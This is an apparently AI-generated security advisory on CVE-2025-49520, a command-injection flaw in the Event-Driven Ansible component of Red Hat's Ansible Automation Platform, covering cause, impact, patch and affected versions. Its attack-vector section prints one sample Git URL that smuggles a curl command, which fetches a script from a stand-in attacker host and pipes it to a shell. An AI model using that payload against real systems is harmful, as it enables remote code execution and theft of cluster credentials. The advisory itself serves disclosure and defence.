Ansible Automation Platform Hit by Critical Command Injection Flaw (CVE-2025-49520)
Introduction
A critical vulnerability (CVE-2025-49520) has been identified in Red Hat's Ansible Automation Platform, specifically within the Event-Driven Ansible (EDA) component. This flaw allows authenticated attackers to execute arbitrary commands on EDA workers, significantly risking Kubernetes/OpenShift cluster security through potential service account token theft and unauthorized access.
Technical Information
The vulnerability is due to improper input sanitization of user-supplied Git URLs when executing the git ls-remote
command. Attackers can exploit this by injecting malicious arguments directly into the Git URL, leading to arbitrary command execution on the EDA worker. The executed commands inherit the privileges of the EDA worker, potentially granting attackers access to sensitive resources, including Kubernetes service account tokens.
Attack Vector Example
A malicious Git URL might appear as follows:
https://attacker.com/repo.git;curl${IFS}attacker.com/malware.sh|sh;
This URL, when processed by the vulnerable EDA component, triggers unintended command execution.
Patch Information
To address the vulnerability, the Ansible Automation Platform development team has implemented critical input validation and sanitization measures. These measures ensure that user-provided Git URLs are properly sanitized before use, effectively preventing argument injection and arbitrary command execution.
Users should immediately update their Ansible Automation Platform installations to the latest version containing these security enhancements. The patch significantly mitigates the risk of exploitation, especially in Kubernetes/OpenShift environments.
Affected Systems and Versions
- Ansible Automation Platform versions 2.5 and earlier are vulnerable.
- Kubernetes/OpenShift deployments using EDA workers are particularly susceptible.
Vendor Security History
Red Hat has previously addressed vulnerabilities within the Ansible Automation Platform, including issues in the EDA component. The vendor has a strong track record of promptly responding to security vulnerabilities, maintaining a high remediation rate for critical issues.
References
Organizations are urged to apply the provided patches immediately and follow recommended mitigation strategies to secure their automation infrastructure against potential exploitation.
Source: This report was created using AI